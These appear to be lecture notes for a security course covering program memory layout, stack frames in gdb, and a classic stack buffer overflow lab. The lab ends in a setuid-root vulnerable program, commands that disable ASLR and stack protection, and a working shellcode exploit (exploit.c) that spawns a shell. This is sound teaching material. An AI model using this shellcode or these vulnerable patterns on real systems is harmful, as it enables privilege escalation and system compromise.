## <center> Buffer Overflow Attack </center>

### Program Memory Layout

When a program runs, it is loaded into memory.

A typical C program divides memory into five segments:
- Text segment (also known as the code segment): stores the executable code of the program (usually read-only).
- Data segment: stores **static/global** variables that are initialized in the program, for example:
  - `static char s[] = "hello world";`
  - `static int a = 1;`
- BSS (block started by symbol) segment: stores uninitialized **static/global** variables. These variables are initialized to zero.
- Heap: provides space for dynamic memory allocation (managed through `malloc`, `calloc`, `realloc`, `free`, etc.).
- Stack: a simple data structure with a LIFO (last-in-first-out) access policy. The stack stores local variables defined inside functions, as well as data related to function calls (return address, arguments, etc.).


- The sizes of the text, data, and BSS segments are known as soon as compilation or assembly is completed.
- The stack and heap segments grow and shrink during program execution.
  - Therefore, they tend to be configured such that they grow toward each other. 
  - The boundary between them is flexible.
  - Both can grow until all available memory is used. 

<center> <img src="figure/buffer-overflow/bo1.png" width="400"/>

%%writefile source/mem_layout.c
#include <stdlib.h>
#include <stdio.h>

int x = 100;
int main()
{
  // a and b are local variables stored on the stack
  int   a=2;
  float b=2.5;
  // y is static, so it lives in the BSS segment, not on the stack
  static int y;

  // allocate memory on heap
  int *ptr = (int *) malloc(2*sizeof(int));
  
  // values 5 and 6 stored on heap
  ptr[0]=5;
  ptr[1]=6;

  // deallocate memory on heap
  free(ptr);

  return 0;
}

Run the following:

```
$ gcc -W -Wall -c Computer-Security/source/mem_layout.c
$ gcc -o mem_layout mem_layout.o
$ size mem_layout mem_layout.o
```

Why don't we see stack and heap information?

%%writefile source/mem_layout_print.c
#include <stdlib.h>
#include <stdio.h>

int x = 100;
int main()
{
  int   a=2;
  double b=2.5;
  int   c=4;
  static int y;
  int *ptr = (int *) malloc(2*sizeof(int));  
  ptr[0]=5;
  ptr[1]=6;

  // %p expects a void pointer, so each address is cast explicitly
  printf ("x is %d and is stored at %p\n", x, (void *) &x);
  printf ("a is %d and is stored at %p\n", a, (void *) &a);
  printf ("b is %f and is stored at %p\n", b, (void *) &b);
  printf ("c is %d and is stored at %p\n", c, (void *) &c);
  printf ("y is %d and is stored at %p\n", y, (void *) &y);
  printf ("ptr[0] is %d and is stored at %p\n", ptr[0], (void *) &ptr[0]);
  printf ("ptr[1] is %d and is stored at %p\n", ptr[1], (void *) &ptr[1]);

  // deallocate memory on heap
  free(ptr);
  return 0;
}

Run the following:

```
$ gcc -o mem_layout_print Computer-Security/source/mem_layout_print.c
$ ./mem_layout_print
```

### Stack Memory Layout

- When a function is called, a block of memory called a **stack frame** is pushed onto the top of the stack. A stack frame contains four regions:
    - Arguments that are passed to the function
    - Return address (the address of the instruction right after the function call)
    - Previous frame pointer
    - Local variables of the function
- When the program first starts, the stack contains only one frame, that of the `main` function. 

<center> <img src="figure/buffer-overflow/bo2.png" width="400"/>

%%writefile source/stack_trace.c
#include<stdio.h>
static void display(int i, int *ptr);
    
int main(void) {
 int x = 5;
 int *xptr = &x;
 printf("In main():\n");
 printf("   x is %d and is stored at %p.\n", x, &x);
 printf("   xptr points to %p which holds %d.\n", xptr, *xptr);
 display(x, xptr);
 printf ("The display function has stopped\n");
 return 0;
}
   
void display(int z, int *zptr) {
  printf("In display():\n");
  printf("   z is %d and is stored at %p.\n", z, &z);
  printf("   zptr points to %p which holds %d.\n", zptr, *zptr);
}

Run the following:

```
$ gcc -g -o stack_trace Computer-Security/source/stack_trace.c
$ ./stack_trace
$ gdb stack_trace
gdb-peda$ 
```

In class: alternate between `run`, `break 10`, `backtrace`, `step`, and `n` to see how the stack grows. Use `quit` to exit `gdb`.

```
gdb-peda$ run
gdb-peda$ break 10
gdb-peda$ run
gdb-peda$ backtrace
gdb-peda$ step
gdb-peda$ backtrace
gdb-peda$ n
gdb-peda$ n
gdb-peda$ n
gdb-peda$ backtrace
gdb-peda$ n
gdb-peda$ backtrace
gdb-peda$ n
gdb-peda$ backtrace
gdb-peda$ n
gdb-peda$ n
gdb-peda$ backtrace
```


<center> <img src="figure/buffer-overflow/bo3.png" width="400"/>

### Buffer Overflow Attack

- A memory copy happens when data from one place (the source) is duplicated to another place (the destination).
- Before copying can happen, memory needs to be allocated at the destination.
- If the allocated memory is smaller than the data being copied, the copy writes past the end of the destination, resulting in a buffer overflow.
- Buffer overflow is one of the oldest and most well-known attacks.

#### Why do we need to learn this vulnerability and attack?

- Buffer overflows can still be found buried in legacy or glue code from third-party libraries as web sites grow more complex.
- Working through the theory and practice of this exploit is also a good way to learn:
  - C programming
  - Assembly language
  - Debugging on Linux with gdb
  - The arithmetic needed to understand the breaking points and the hex contents in memory in order to craft an attack

**[Smashing the Stack, 2016](https://www.aap3recruitment.com/news/smashing-the-stack/14074/)**

**strcpy()**

%%writefile source/test_strcpy.c
#include <string.h>
#include <stdio.h>
int main(void){
  char src[40] = "Hello World \0 Extra string";
  char dest[40];
  strcpy(dest, src);
  printf("%s\n",dest);
  return 0;
}



Compile and run `test_strcpy` in your terminal.
- What happens? Why is the string not copied properly?

%%writefile source/strcpy_overflow.c
#include <string.h>

void foo(char *str)
{
    char buffer[12];

    /* The following statement will result in buffer overflow */ 
    strcpy(buffer, str);
}

int main()
{
    char *str = "This is definitely longer than 12";    
    foo(str);

    return 1;
}

Run the following:
```
$ gcc -o strcpy_overflow Computer-Security/source/strcpy_overflow.c
$ ./strcpy_overflow
```

Now recompile with the stack protector disabled and the stack marked executable, then run the program again:
```
$ gcc -z execstack -fno-stack-protector -o strcpy_overflow Computer-Security/source/strcpy_overflow.c
$ ./strcpy_overflow
```

Run the following gdb debugging sequence and examine the frames at each backtrace. What happens in the last backtrace?
```
gdb-peda$ break 14
gdb-peda$ run
gdb-peda$ backtrace
gdb-peda$ step
gdb-peda$ backtrace
gdb-peda$ n
gdb-peda$ backtrace
```

<center> <img src="figure/buffer-overflow/bo4.png" width="400"/>

- The region above the buffer includes critical values, including the return address and the previous frame pointer. 
- The consequences of a modified return address (due to buffer overflow) include:
  - The new address (virtual address) might not be mapped to any physical address, leading to an invalid return instruction and a crashed program. 
  - The address might be mapped to a physical address in protected system space, leading to a failed jump and a crashed program. 
  - The address might be mapped to a physical address that does not contain any valid instruction, leading to a failed return and a crashed program. 
  - **The address might be mapped to a physical address that happens to contain valid machine instructions, leading to a continuing program with logic different from the original program.**

#### Exploiting a Buffer Overflow Vulnerability

- By overflowing a buffer, we can cause the program to crash or run something else. 
- If the program is privileged, this means *something else* will be run with privilege, leading to potential privilege escalation for *something malicious*. 

%%writefile source/stack.c
/* stack.c */
/* This program has a buffer overflow vulnerability. */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int foo(char *str)
{
    char buffer[100];

    /* The following statement has a buffer overflow problem */ 
    strcpy(buffer, str);

    return 1;
}

int main(int argc, char **argv)
{
    char str[400];
    FILE *badfile;

    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 300, badfile);
    foo(str);

    printf("Returned Properly\n");
    return 1;
}


- Clearly, there is a buffer overflow issue: `foo()` copies up to 300 bytes read from `badfile` into a 100-byte buffer.
- What needs to be stored in `badfile` to exploit this issue?

<center> <img src="figure/buffer-overflow/bo5.png" width="500"/>

Disable the address space layout randomization countermeasure:
```
$ sudo sysctl -w kernel.randomize_va_space=0
```
Include the following flags in your gcc command:
- `-z execstack`: marks the stack as executable
- `-fno-stack-protector`: disables the compiler's stack protector (canary) check

Run the following:
```
$ gcc -o stack -z execstack -fno-stack-protector Computer-Security/source/stack.c
$ sudo chown root stack
$ sudo chmod 4755 stack
$ echo "aaaa" > badfile
$ ./stack
$ echo "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" > badfile
$ ./stack
```

How do we know (or guess) where the stack frame of `foo()` will be, so that we can locate the malicious code and set the jump address accordingly?
- The stack has a fixed starting address (before the address randomization countermeasure was introduced). 
- The stack is usually shallow (programs that follow good programming practice rarely use deeply nested function calls). 

Disable address randomization and then run `mem_layout_print` several times. Do the addresses of the variables on the stack change between runs?

<center> <img src="figure/buffer-overflow/bo6.png" width="500"/>

How can we find the return address without guessing?

Run the following:
```
$ gcc -g -o stack_dbg -z execstack -fno-stack-protector Computer-Security/source/stack.c
$ rm badfile
$ touch badfile
$ gdb stack_dbg
gdb-peda$ break foo
gdb-peda$ run
gdb-peda$ print $ebp
gdb-peda$ print &buffer
gdb-peda$ print/x (long) $ebp - (long) &buffer
gdb-peda$ quit
```

- What is 0x6C in decimal?

<center> <img src="figure/buffer-overflow/bo7.png" width="500"/>

The following code must be updated every time you retest this program: first go through the debugging process to identify the correct stack position, then adjust the return address accordingly.

%%writefile source/exploit.c
/* exploit.c  */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
    "\x31\xc0"             /* xorl    %eax,%eax     */
    "\x50"                 /* pushl   %eax          */
    "\x68""//sh"           /* pushl   $0x68732f2f   */
    "\x68""/bin"           /* pushl   $0x6e69622f   */
    "\x89\xe3"             /* movl    %esp,%ebx     */
    "\x50"                 /* pushl   %eax          */
    "\x53"                 /* pushl   %ebx          */
    "\x89\xe1"             /* movl    %esp,%ecx     */
    "\x99"                 /* cdq                   */
    "\xb0\x0b"             /* movb    $0x0b,%al     */
    "\xcd\x80"             /* int     $0x80         */
;

int main(void)
{
  char buffer[200];
  FILE *badfile;

  /* A. Initialize buffer with 0x90 (NOP instruction) */
  memset(buffer, 0x90, sizeof(buffer));

  /* B. Fill the return address field with a candidate 
        entry point of the malicious code */
  *((long *) (buffer + 112)) = 0xbfffe908 + 0x80;

  /* C. Place the shellcode towards the end of buffer */
  memcpy(buffer + sizeof(buffer) - sizeof(shellcode), shellcode, 
         sizeof(shellcode));

  /* Save the contents to the file "badfile" */
  badfile = fopen("./badfile", "w");
  fwrite(buffer, sizeof(buffer), 1, badfile);
  fclose(badfile);
  return 0;
}

Run the following (after modifying `exploit.c` accordingly):
```
$ rm badfile
$ gcc -o exploit Computer-Security/source/exploit.c
$ ./exploit
$ ./stack
```